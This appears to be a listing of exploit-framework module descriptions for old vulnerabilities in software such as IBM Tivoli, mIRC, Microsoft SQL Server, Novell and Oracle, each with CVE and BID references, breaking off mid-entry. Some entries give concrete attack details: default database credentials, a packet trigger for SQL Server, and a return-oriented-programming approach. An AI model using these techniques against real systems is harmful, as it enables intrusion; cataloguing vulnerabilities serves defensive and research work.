This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote Client Agent service. By sending a "dicuGetIdentify" request packet containing a long NodeName parameter, an attacker can execute arbitrary code. NOTE: this exploit first connects to the CAD service to start the RCA service and obtain the port number on which it runs. This service does not restart. CVE-2008-4828 OSVDB-54232 BID-34803

LANDesk Management Suite 8.7 Alert Service Buffer Overflow
This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending an overly long string to the Alert Service, a buffer is overwritten and arbitrary code can be executed. CVE-2007-1674 OSVDB-34964 http://www.tippingpoint.com/s...

Mercury/32 <= v4.01b PH Server Module Buffer Overflow
This module exploits a stack-based buffer overflow in Mercury/32 <= v4.01b PH Server Module. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. CVE-2005-4411 OSVDB-22103 BID-16396

mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow
This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier. By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads may be necessary. This module is based on the code by SkD. CVE-2008-4449 OSVDB-48752 BID-31552 http://www.milw0rm.com/exploi...

Microsoft DirectX DirectShow SAMI Buffer Overflow
This module exploits a stack buffer overflow in the DirectShow Synchronized Accessible Media Interchange (SAMI) parser in quartz.dll. This module has only been tested with Windows Media Player (6.4.09.1129) and DirectX 8.0. CVE-2007-3901 OSVDB-39126 MSB-MS07-064 BID-26787

Netcat v1.10 NT Stack Buffer Overflow
This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending an overly long string we are able to overwrite SEH. The vulnerability exists when netcat is used to bind (-e) an executable to a port in doexec.c. This module tested successfully using "c:\>nc -L -p 31337 -e ftp". CVE-2004-1317 OSVDB-12612 BID-12106 http://www.milw0rm.com/exploi...

NetTransport Download Manager 2.90.510 Buffer Overflow
This exploits a stack buffer overflow in NetTransport Download Manager, part of the NetXfer suite. This module was tested successfully against version 2.90.510. OSVDB-61435 http://www.exploit-db.com/exp...

POP Peeper v3.4 DATE Buffer Overflow
This module exploits a stack buffer overflow in POP Peeper v3.4. When a specially crafted DATE string is sent to a client, an attacker may be able to execute arbitrary code. This module is based off of krakowlabs code. CVE-2009-1029 OSVDB-53560 BID-34093 http://www.krakowlabs.com/res...

POP Peeper v3.4 UIDL Buffer Overflow
This module exploits a stack buffer overflow in POP Peeper v3.4. When a specially crafted UIDL string is sent to a client, an attacker may be able to execute arbitrary code. This module is based off of krakowlabs code. OSVDB-53559 BID-33926 http://www.krakowlabs.com/res...

Realtek Media Player Playlist Buffer Overflow
This module exploits a stack buffer overflow in Realtek Media Player (RtlRack) A4.06. When a Realtek Media Player client opens a specially crafted playlist, an attacker may be able to execute arbitrary code. CVE-2008-5664 OSVDB-50715 BID-32860

SAP Business One License Manager 2005 Buffer Overflow
This module exploits a stack buffer overflow in the SAP Business One 2005 License Manager 'NT Naming Service' A and B releases. By sending an excessively long string, the stack is overwritten, enabling arbitrary code execution. OSVDB-56837 BID-35933 http://www.milw0rm.com/exploi...

ShixxNOTE 6.net Font Field Overflow
This module exploits a buffer overflow in ShixxNOTE 6.net. The vulnerability is caused due to boundary errors in the handling of font fields. CVE-2004-1595 OSVDB-10721 BID-11409

Talkative IRC v0.4.4.16 Response Buffer Overflow
This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16. When a specially crafted response string is sent to a client, an attacker may be able to execute arbitrary code. OSVDB-64582 BID-34141 http://milw0rm.com/exploits/8227

TinyIdentD 2.2 Stack Buffer Overflow
This module exploits a stack based buffer overflow in TinyIdentD version 2.2. If we send a long string to the ident service we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone. CVE-2007-2711 OSVDB-36053 BID-23981

UFO: Alien Invasion IRC Client Buffer Overflow Exploit
This module exploits a buffer overflow in the IRC client component of UFO: Alien Invasion 2.2.1. OSVDB-65689 http://www.exploit-db.com/exp...

VideoLAN VLC TiVo Buffer Overflow
This module exploits a buffer overflow in VideoLAN VLC 0.9.4. By creating a malicious TY file, a remote attacker could overflow a buffer and execute arbitrary code. CVE-2008-4654 OSVDB-49181 BID-31813

Windows RSH daemon Buffer Overflow
This module exploits a vulnerability in Windows RSH daemon 1.8. The vulnerability is due to a failure to check the length of input sent to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit to be successful. CVE-2007-4006 OSVDB-38572 BID-25044

Windows Media Services ConnectFunnel Stack Buffer Overflow
This module exploits a stack buffer overflow in the Windows Media Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially crafted FunnelConnect request, an attacker can execute arbitrary code under the "NetShowServices" user account. Windows Media Services 4.1 ships with Windows 2000 Server, but is not installed by default. NOTE: This service does NOT restart automatically. Successful as well as unsuccessful exploitation attempts will kill the service, which prevents additional attempts. CVE-2010-0478 OSVDB-63726 MSB-MS10-025 https://www.lexsi.com/abonnes...

Timbuktu Pro Directory Traversal/File Upload
This module exploits a directory traversal vulnerability in Motorola's Timbuktu Pro for Windows 8.6.5. CVE-2008-1117 OSVDB-43544

Lyris ListManager MSDE Weak sa Password
This module exploits a weak password vulnerability in the Lyris ListManager MSDE install. During installation, the 'sa' account password is set to 'lminstall'. Once the install completes, it is set to 'lyris' followed by the process ID of the installer. This module brute forces all possible process IDs that would be used by the installer. CVE-2005-4145 OSVDB-21559

Microsoft SQL Server Resolution Overflow
This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a UDP packet to port 1434 which starts with 0x04 and is followed by a long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3). CVE-2002-0649 OSVDB-4578 BID-5310 MSB-MS02-039

Microsoft SQL Server Hello Overflow
By sending malformed data to TCP port 1433, an unauthenticated remote attacker could overflow a buffer and possibly execute code on the server with SYSTEM level privileges. This module should work against any vulnerable SQL Server 2000 or MSDE install (< SP3). CVE-2002-1123 OSVDB-10132 BID-5411 MSB-MS02-056

Microsoft SQL Server sp_replwritetovarbin Memory Corruption
A heap-based buffer overflow can occur when calling the undocumented "sp_replwritetovarbin" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005 without any public mention. This exploit smashes several pointers, as shown below. 1. A pointer to a 32-bit value that is set to 0. 2. A pointer to a 32-bit value that is set to a length influenced by the buffer length. 3. A pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4. On MSSQL 2005, an additional vtable pointer is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a "jmp esp". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. Otherwise, it's a goner. OSVDB-50589 CVE-2008-5416 BID-32710 MSB-MS09-004 http://www.milw0rm.com/exploi...

Microsoft SQL Server Payload Execution
This module will execute an arbitrary payload on a Microsoft SQL Server, using the Windows debug.com method for writing an executable to disk and the xp_cmdshell stored procedure. File size restrictions are avoided by incorporating the debug bypass method presented at Defcon 17 by SecureState. Note that this module will leave a metasploit payload in the Windows System32 directory which must be manually deleted once the attack is completed. CVE-2000-0402 OSVDB-557 BID-1281 CVE-2000-1209 OSVDB-15757 BID-4797 http://www.thepentest.com/pre...

MySQL yaSSL SSL Hello Message Buffer Overflow
This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier) implementation bundled with MySQL <= 6.0. By sending a specially crafted Hello packet, an attacker may be able to execute arbitrary code. CVE-2008-0226 OSVDB-41195 BID-27140

Omni-NFS Server Buffer Overflow
This module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2. When sending a specially crafted NFS packet, an attacker may be able to execute arbitrary code. CVE-2006-5780 OSVDB-30224 BID-20941 http://www.securityfocus.com/...

Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
This module exploits a stack buffer overflow in the news reader of Microsoft Outlook Express. CVE-2005-1213 OSVDB-17306 BID-13951 MSB-MS05-030

Novell GroupWise Messenger Client Buffer Overflow
This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client. By sending a specially crafted HTTP response, an attacker may be able to execute arbitrary code. CVE-2008-2703 OSVDB-46041 BID-29602 http://www.infobyte.com.ar/ad...

Novell NetMail <= 3.52d NMAP STOR Buffer Overflow
This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. CVE-2006-6424 OSVDB-31363 BID-21725

Novell ZENworks 6.5 Desktop/Server Management Overflow
This module exploits a heap overflow in the Novell ZENworks Desktop Management agent. This vulnerability was discovered by Alex Wheeler. CVE-2005-1543 OSVDB-16698 BID-13678

Oracle 8i TNS Listener Buffer Overflow
This module exploits a stack overflow in Oracle 8i. When sending a specially crafted packet to the TNS service, an attacker may be able to execute arbitrary code. CVE-2001-0499 BID-2941

Oracle Secure